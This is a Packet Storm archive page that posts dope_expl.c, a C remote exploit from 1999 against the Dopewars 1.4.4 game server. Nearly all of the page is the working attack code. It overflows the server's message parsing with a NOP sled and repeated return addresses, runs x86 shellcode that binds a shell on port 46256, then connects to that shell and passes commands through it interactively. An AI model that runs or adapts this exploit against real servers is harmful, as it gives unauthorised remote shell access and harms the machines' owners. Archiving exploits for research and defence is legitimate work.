what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

dope_expl.c

dope_expl.c
Posted Apr 5, 2000
Authored by Lamagra | Site lamagra.seKure.de

dopewars 1.4.4 exploit, it's been fixed now ( thanks to my patch :-) ). It dates back to oktober 1999. But i used some cool methods in it.

SHA-256 | f7b77db072d1405a450204a66ded9b44f5d8fe5c91b142d9376c984870b4f68f

dope_expl.c

Change Mirror Download
/* PRIVATE                  Do NOT Distribute                      PRIVATE */
#include <sys/socket.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <netdb.h>
#include <stdio.h>

/*
* Dopewars by Ben Webb (Version 1.4.4 maybe older ones too).
* This exploit will cause a shell to be created on port 46256.
* The bug in located inside the ProcessMessage() and ExtractWordDelim()
* functions.
*
* I already send a patch to the Ben Webb and he'll add it in the next release.
*
* Date: oktober 1999
* Lamagra <access-granted@geocities.com>
*/

char hellshell[]=
"\x55\x89\xe5\xb2\x66\x89\xd0\x31\xc9"
"\x89\xcb\x43\x89\x5d\xf8\x43\x89\x5d\xf4\x4b\x89"
"\x4d\xfc\x8d\x4d\xf4\xcd\x80\x31\xc9\x89\x45\xf4"
"\x43\x66\x89\x5d\xec\x66\xc7\x45\xee\xb4\xb0\x89"
"\x4d\xf0\x8d\x45\xec\x89\x45\xf8\xc6\x45\xfc\x10"
"\x89\xd0\x8d\x4d\xf4\xcd\x80\x89\xd0\x43\x43\xcd"
"\x80\x89\xd0\x43\xcd\x80\x89\xc3\x31\xc9\xb2\x3f"
"\x89\xd0\xcd\x80\x89\xd0\x41\xcd\x80\x89\xd0\x41"
"\xcd\x80\xc7\x45\xe8\x2f\x62\x69\x6e\x66\xc7\x45"
"\xec\x2f\x73\xc6\x45\xee\x68\x31\xc9\x88\x4d\xef"
"\xb0\x0b\x8d\x5d\xe8\x89\x5d\xe0\x8d\x4d\xe0\x31"
"\xd2\x89\x55\xe4\xcd\x80";

char jmpcode[]="\xeb\x0d";

int shell(unsigned long);
void transfer(char *, int);
void do_expl(int,int,long);
unsigned long resolve(char *);


main(int argc, char **argv)
{
int time,offset=0,client,fd;
struct sockaddr_in addr, clientaddr;
long eip = 0xbffff620;

if(argc < 2)
{
printf("Usage: %s {[-b] [offset]} {[hostname] [offset]}\n",argv[0]);
exit(-1);
}

if(argc > 2)
{
if(!strncmp(argv[2],"0x",2)) eip = strtoul(argv[2],0,0);
else offset = atoi(argv[2]);
}

fd = socket(AF_INET,SOCK_STREAM,0);
addr.sin_family = AF_INET;
addr.sin_port = htons(7902);

if(strcmp(argv[1],"-b"))
{
addr.sin_addr.s_addr = resolve(argv[1]);

for(time = 0;time < 20;time++)
{
/* Connect to server */

while(connect(fd,(struct sockaddr *)&addr,sizeof(struct sockaddr)) == -1)
{
perror("can't connect to server");
memset(addr.sin_zero,NULL,sizeof(addr.sin_zero));
sleep(20);
}

do_expl(fd,offset,eip);
sleep(1);
shell(addr.sin_addr.s_addr);
offset += 100; /* increase offset and try again */
}
}
else{
/* bind to 7902 and wait for a client */
addr.sin_addr.s_addr = INADDR_ANY;
if(bind(fd,(struct sockaddr *)&addr,16) == -1)
{
perror("bind");
exit(-1);
}
listen(fd,5);
bzero((char*)&clientaddr,sizeof(struct sockaddr_in));
client = accept(fd,&clientaddr,16);
do_expl(client,offset,eip);
sleep(1);
shell(clientaddr.sin_addr.s_addr);
}
close(fd);
}

void do_expl(int fd,int offset, long addy)
{
char buf[1024],*sploit;
char nops[213];
int x;
long *addr_ptr;

/* check eip for 0x0 */
if(!(addy+offset & 0xff) || !(addy+offset & 0xff00) || !(addy+offset & 0xff0000) || !(addy+offset & 0xff000000))
{
printf("NULL detected in address\n");
offset += 1;
}


sploit = nops;
for(x = 0;x < 200 - strlen(jmpcode);x++)
*(sploit++) = 0x90;

for(x = 0;x < strlen(jmpcode);x++)
*(sploit++) = jmpcode[x];

printf("Using address: 0x%x\n",addy+offset);
addr_ptr = (long *)(sploit++);
for(x = 0; x < 12;x+=4)
*(addr_ptr++) = addy + offset;

sprintf(buf,"%s^%s^%s\n",nops,nops, hellshell);
write(fd,buf,strlen(buf));
}

int shell(unsigned long addy)
{
char buf[1024];
fd_set set;
int len,sockfd;
struct sockaddr_in addr;

addr.sin_family = AF_INET;
addr.sin_port = htons(46256);
addr.sin_addr.s_addr = addy;

sockfd = socket(AF_INET,SOCK_STREAM,0);
if(connect(sockfd,(struct sockaddr *)&addr,sizeof(struct sockaddr)) == -1)
{
perror("Sploit failed, connect");
close(sockfd);
return -1;
}
strcpy(buf,"cd /;id;echo \"hehe success, don't do anything nasty\"\n");
write(sockfd,buf,strlen(buf));

while(1)
{
FD_SET(fileno(stdin),&set);
FD_SET(sockfd,&set);
select(sockfd+1,&set,NULL,NULL,NULL);

if(FD_ISSET(fileno(stdin),&set))
{
memset(buf,NULL,1024);
fgets(buf,1024,stdin);
write(sockfd,buf,strlen(buf));
}

if(FD_ISSET(sockfd,&set))
{
memset(buf,NULL,1024);
if((len = read(sockfd,buf,1024)) == 0)
{
printf("EOF.\n");
close(sockfd);
exit(-1);
}

if(len == -1)
{
perror("read");
exit(-1);
}
puts(buf);
}
}
}

unsigned long resolve(char *name)
{
struct hostent *hp;
unsigned long ip;

if((ip = inet_addr(name)) == -1)
{
if((hp = gethostbyname(name)) == NULL)
{
printf("Unable to resolve <%s>\n",name);
exit(-1);
}
memcpy(&ip,hp->h_addr,4);
}
return ip;
}

Login or Register to add favorites

File Archive:

June 2022

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jun 1st
    19 Files
  • 2
    Jun 2nd
    16 Files
  • 3
    Jun 3rd
    28 Files
  • 4
    Jun 4th
    0 Files
  • 5
    Jun 5th
    0 Files
  • 6
    Jun 6th
    19 Files
  • 7
    Jun 7th
    23 Files
  • 8
    Jun 8th
    11 Files
  • 9
    Jun 9th
    10 Files
  • 10
    Jun 10th
    4 Files
  • 11
    Jun 11th
    0 Files
  • 12
    Jun 12th
    0 Files
  • 13
    Jun 13th
    0 Files
  • 14
    Jun 14th
    0 Files
  • 15
    Jun 15th
    0 Files
  • 16
    Jun 16th
    0 Files
  • 17
    Jun 17th
    0 Files
  • 18
    Jun 18th
    0 Files
  • 19
    Jun 19th
    27 Files
  • 20
    Jun 20th
    65 Files
  • 21
    Jun 21st
    10 Files
  • 22
    Jun 22nd
    8 Files
  • 23
    Jun 23rd
    6 Files
  • 24
    Jun 24th
    6 Files
  • 25
    Jun 25th
    0 Files
  • 26
    Jun 26th
    0 Files
  • 27
    Jun 27th
    15 Files
  • 28
    Jun 28th
    14 Files
  • 29
    Jun 29th
    11 Files
  • 30
    Jun 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Hosting By
Rokasec
close